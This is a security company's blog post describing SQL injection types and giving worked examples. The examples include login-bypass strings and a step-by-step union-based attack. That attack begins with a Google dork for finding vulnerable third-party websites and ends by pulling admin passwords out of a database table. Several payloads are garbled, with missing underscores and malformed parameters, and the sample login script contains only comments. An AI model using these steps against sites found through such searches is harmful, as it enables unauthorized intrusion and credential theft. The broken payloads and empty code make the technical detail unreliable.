SQL Injection Types – How to Test SQL Injection Manually

August 21st, 2019 . 7 minutes read
Blog featured image

SQL injection is a code injection technique used to hack websites, attack data applications, destroy databases by inserting malicious SQL statements into input boxes for execution (for example, downloading database-driven content into a database). These declarations control a database server behind a web application.

“The OWASP organization (Open Web Application Security Project) has published a list of injections in its OWASP Top 10 document and has declared them as the number one threat to web application security.”

Impacts of a SQL Injection Attack

SQL injection attacks are one of the oldest, most frequent and most dangerous web application vulnerabilities. A SQL injection vulnerability can affect any application or website that uses an SQL database such as MySQL, Oracle, SQL Server or other.

  • Attackers can use SQL injection vulnerabilities to breach application security measures.
  • The authentication and authorization of a web or web application can be crashed and the contents of the entire SQL database can be recovered.
  • Hackers can add, modify and delete records in the database using SQL injection.
  • Criminals can use to gain unauthorized access to sensitive data: customer information, personal data, trade secrets, intellectual property and more.

impact theory of sql

Types of SQL Injection

SQL injection can be used in different ways to cause serious problems. By taking advantage of SQL injection, an attacker could ignore authentication and can access, modify, and delete data within a database. In some cases, SQL injection can even be used to execute commands in the operating system, potentially allowing the attacker to become more harmful to attack within a network behind a firewall.

#1- In-band SQLi (Classic SQLi)

In-band SQL injection is the most common and easy-to-take-advantage kind of SQL injection attacks. It occurs when an attacker uses the same communication channel to launch the attack as well as to get results. The two most common types of in-band SQL Injection are Error-Based SQLi and Union-Based SQLi.

  • Error-based SQLi: Error-based SQLi is an in-band SQL injection technique based on error messages. In some cases, error-based SQL injection is sufficient to allow an attacker to enumerate a complete database. Although errors are very useful during a web application, they should be disabled on an active site.
  • Union-based SQLi: Union-based SQLi is an in-band SQL injection technique that leverages the UNION SQL operator to combine the results of two or more SELECT statements into a single result which is then returned as part of the HTTP response.

#2- SQLi Inferential (Blind SQLi)

The inferential injection of SQL, unlike SQLi in-band, may take longer to attack, however it is just as dangerous as any other form of SQLi. In an inferential SQLi attack, the data is not actually transferred via the web application thus, the attacker cannot see the result of the attack within the band (so these attacks are commonly referred to as “Blind SQL Injection Attacks”). Instead, the attacker can rebuild the database structure by sending payloads, observing the response of the web application and the resulting behavior of the database server.

There are two types of inferential SQL injection as described below-

  • Boolean based blind SQL (based on content): Boolean SQL injection is an inferential SQL inference technique based on sending an SQL query to the database that forces the application to return different outcomes depending on whether the query returns a TRUE or FALSE result. Depending on the result, the content within the HTTP response will either change or remain the same.
    • This allows an attacker to infer if the payload used returned true or false, even if no data is returned from the database. 
    • This attack is usually slow (especially in large databases) because an attacker would have to list a database, character by character.
  • Time-based SQLi: Time-based SQL injection is an inferential SQL injection technique based on sending a SQL query to the database that forces the database to wait for a specific time (in seconds) before responding. The response time will indicate to the attacker if the query result is TRUE or FALSE.

Examples of SQL Injection

Authentication Bypass:

It shows how an attacker can use a SQL Injection vulnerability to control the security of the application and authenticate as an administrator.

The following script is executed on a web server. It is an example of authentication with a username and password. The sample database has a table called users with the following columns: username and password.

#Define Variables

#Generate SQL Command.

#Execute the SQL Command

These input fields are vulnerable to SQL injection. An attacker could use SQL commands in the entry in a way that would alter the SQL statement executed by the database server. For example:

password’ OR 1=1

As a result, the database server executes the following SQL query:

SELECT id FROM users WHERE username=’username’ AND password=’password’ OR 1=1′

Because of the OR 1 = 1, the WHERE clause returns the first id of the user table, regardless of the user name and password. The first user ID in a database is very often the administrator. In this way, the attacker not only ignores authentication but also obtains administrator privileges. They can also comment on the rest of the SQL statement to further control the execution of the SQL query:

— MySQL, MSSQL, Oracle, PostgreSQL, SQLite

‘ OR ‘1’=’1′ —

‘ OR ‘1’=’1′ /*


‘ OR ‘1’=’1′ #

Union-Based SQL Injection:

One of the most common types of SQL injection uses the UNION operator. It allows the attacker to combine the results of two or more SELECT statements into a single result. The technique is called SQL-based injection.

Step1: use google dork to find the parametric link –

            e.g. inurl:.php?id=3 site:.nl

Step2: After finding the link try to check if there is any database is available or not –

http://www.xyz.com/content.php?Id=-2 or =2′ (you will get the following link) after this put ” ‘ ” single quote after number, in our case it is 3. After hitting on the URL if it shows an error then it shows that there is a database exists on the website.

Step 3: This step is used to check the number of tables present in the database of the website –

http://www.xyz.com/content.php?Id-2 order by 1, 2, 3, 4, 5, 6, 7, 8, 9,10,11,12,13 –+-

Step 4: After checking the number of tables, now select the table that this is display on the webpage –

http://www.xyz.com/content.php?Id=-2 union select table name, 3, 4, 5, 6, 7, 8,9,10,11,12,13 from information schema.tables–+-

Step 5: this step will concat the table name that we are going to target –

http://www.xyz.com/content.php?Id=-2 union select 1, group concat(table_name),3,4,5,6,7,8,9,10,11,12,13 from information_schema.tables where table schema=database() –+-

Step 6: It retrieve all the column name from the table –  

http://www.xyz.com/content.php?Id=-2 union select 1, group_concat (column name),3,4,5,6,7,8, 9,10,11,12,13 from information_schema.columns where table_name=’tbl admin’ –+

Step 7: It get the required entity that user wants form the table –

http://www.xyz.com/content.php?Id=-2 union select 1, group concat (plugin, ‘ $$$’,pass),3,4,5,6,7,8,9,10,11,12,13 from tbl_admin –+-

Click here to know about Ransomware Attack


After doing these examples we can check the vulnerabilities of data breaching manually from our web application. Here Data Breaching means getting all the data over the web application by unauthorized access. We provide best web development support and mobile development services and support for you, contact us if you have something to build.

Tell your friends and colleagues about these threats if they are unaware of it, it can save their money and their data to destroy. If you have any questions and queries in mind then ask in the comment section.


Author: rajanagori